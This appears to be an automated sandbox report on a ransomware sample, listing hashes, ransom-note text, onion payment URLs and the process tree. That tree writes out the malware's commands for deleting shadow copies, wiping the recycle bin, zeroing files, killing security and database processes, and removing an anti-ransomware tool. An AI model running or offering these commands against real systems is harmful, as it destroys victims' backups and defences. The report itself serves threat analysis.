Analysis
- max time kernel: 145s
- max time network: 57s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 17-05-2021 09:03
- Static task: static1
- Behavioral task: behavioral1 (Sample: sample.exe; Resource: win7v20210410)
- Behavioral task: behavioral2 (Sample: sample.exe; Resource: win10v20210408)
General
- Target: sample.exe
- Size: 142KB
- MD5: e1f063d63a75e0e0e864052b1a50ab06
- SHA1: 75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
- SHA256: 8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
- SHA512: 25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3
Malware Config
Extracted
- Path: C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
- URL: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454
- URL: http://prometheusdec.in/ticket.php?track=141-5D9-Y454
Extracted
- Path: C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
- URL: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454
- URL: http://prometheusdec.in/ticket.php?track=141-5D9-Y454
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes: sample.exe
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk (sample.exe)
Modifies WinLogon 2 TTPs 2 IoCs
Processes: sample.exe
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" (sample.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" (sample.exe)
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Modifies registry class 2 IoCs
Processes: OpenWith.exe, OpenWith.exe
- Key created: \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings (OpenWith.exe)
- Key created: \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings (OpenWith.exe)
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes: NOTEPAD.EXE (pid 3668)
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes: OpenWith.exe (pid 1780), OpenWith.exe (pid 1508)
Suspicious use of AdjustPrivilegeToken 49 IoCs
Suspicious use of FindShellTrayWindow 3 IoCs
Processes: sample.exe (pid 620, 3 hits)
Suspicious use of SendNotifyMessage 3 IoCs
Processes: sample.exe (pid 620, 3 hits)
Suspicious use of SetWindowsHookEx 19 IoCs
Processes: mshta.exe (pid 188), OpenWith.exe (pid 1780), OpenWith.exe (pid 1508, 17 hits)
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 4 IoCs
Processes: sample.exe
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" (sample.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (sample.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" (sample.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" (sample.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\sample.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\sample.exe"
  Signatures: Drops startup file; Modifies WinLogon; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory; System policy modification
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill" /F /IM RaccineSettings.exe
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\reg.exe
    Command line: "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  - C:\Windows\SYSTEM32\reg.exe
    Command line: "reg" delete HKCU\Software\Raccine /F
    Signatures: Modifies registry key
  - C:\Windows\SYSTEM32\schtasks.exe
    Command line: "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  - C:\Windows\SYSTEM32\sc.exe
    Command line: "sc.exe" config Dnscache start= auto
  - C:\Windows\SYSTEM32\sc.exe
    Command line: "sc.exe" config SQLTELEMETRY start= disabled
  - C:\Windows\SYSTEM32\sc.exe
    Command line: "sc.exe" config FDResPub start= auto
  - C:\Windows\SYSTEM32\sc.exe
    Command line: "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  - C:\Windows\SYSTEM32\sc.exe
    Command line: "sc.exe" config SSDPSRV start= auto
  - C:\Windows\SYSTEM32\sc.exe
    Command line: "sc.exe" config SstpSvc start= disabled
  - C:\Windows\SYSTEM32\sc.exe
    Command line: "sc.exe" config SQLWriter start= disabled
  - C:\Windows\SYSTEM32\sc.exe
    Command line: "sc.exe" config upnphost start= auto
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mspub.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM synctime.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mspub.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\netsh.exe
    Command line: "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mysqld.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM Ntrtscan.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mydesktopqos.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM sqbcoreservice.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mydesktopservice.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM isqlplussvc.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM firefoxconfig.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM encsvc.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM onenote.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM tbirdconfig.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM agntsvc.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM excel.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM dbeng50.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM PccNTMon.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM thebat.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM msaccess.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM CNTAoSMgr.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM thebat64.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM steam.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM sqlwriter.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM outlook.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM ocomm.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" IM thunderbird.exe /F
    Signatures: Kills process with taskkill
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM tmlisten.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM dbsnmp.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM wordpad.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM infopath.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM msftesql.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM xfssvccon.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mysqld-opt.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mbamtray.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM powerpnt.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM zoolz.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM ocautoupds.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mydesktopqos.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM ocssd.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM visio.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mydesktopservice.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM oracle.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM sqlagent.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM winword.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\netsh.exe
    Command line: "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM sqlbrowser.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM mysqld-nt.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\taskkill.exe
    Command line: "taskkill.exe" /IM sqlservr.exe /F
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\arp.exe
    Command line: "arp" -a
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  - C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
    Signatures: Suspicious use of SetWindowsHookEx
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    - C:\Windows\system32\PING.EXE
      Command line: ping 127.0.0.7 -n 3
      Signatures: Runs ping.exe
    - C:\Windows\system32\fsutil.exe
      Command line: fsutil file setZeroData offset=0 length=524288 “%s”
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe
    - C:\Windows\system32\choice.exe
      Command line: choice /C Y /N /D Y /T 3
- C:\Windows\system32\OpenWith.exe
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
  Signatures: Modifies registry class; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx
- C:\Windows\system32\OpenWith.exe
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
  Signatures: Modifies registry class; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx
  - C:\Windows\system32\NOTEPAD.EXE
    Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UnlockNew.shtml.[141-5D9-Y454]
    Signatures: Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  MD5: 4327eade29c8136a9a681c47b567b97d
  SHA1: 60d8cb724de3c4974ea604de9406c950872cf8ae
  SHA256: 62f1117aac61afa132c1555964adecccbd66c4b71fdda3b0a68babffcee898bb
  SHA512: ad66d8d83aeb26da99bbb58e22af241a0c15a5904250b6a61f5a1a5e6a8d56a291f75bcc42721dc649df0680bdc6250f809c1862dc454f748772784fe7a0a913
- C:\Users\Admin\Desktop\UnlockNew.shtml.[141-5D9-Y454]
  MD5: 18a4f65d78ecf967a2c8ac5430c61ab9
  SHA1: cdd8a116a71bd52269ef91960ddde56efd5d6c45
  SHA256: 7dbc9b7f37a5757a19b695b4ad30d154d8c7b3c98685b12891762387329daa93
  SHA512: 7d1aa0c312800864b49a4d93141188c89de6736be7d17b3854a012df67be5c420962a93ad00cf3e6de35707c6a023212aeecc18e911964269035fa360565c728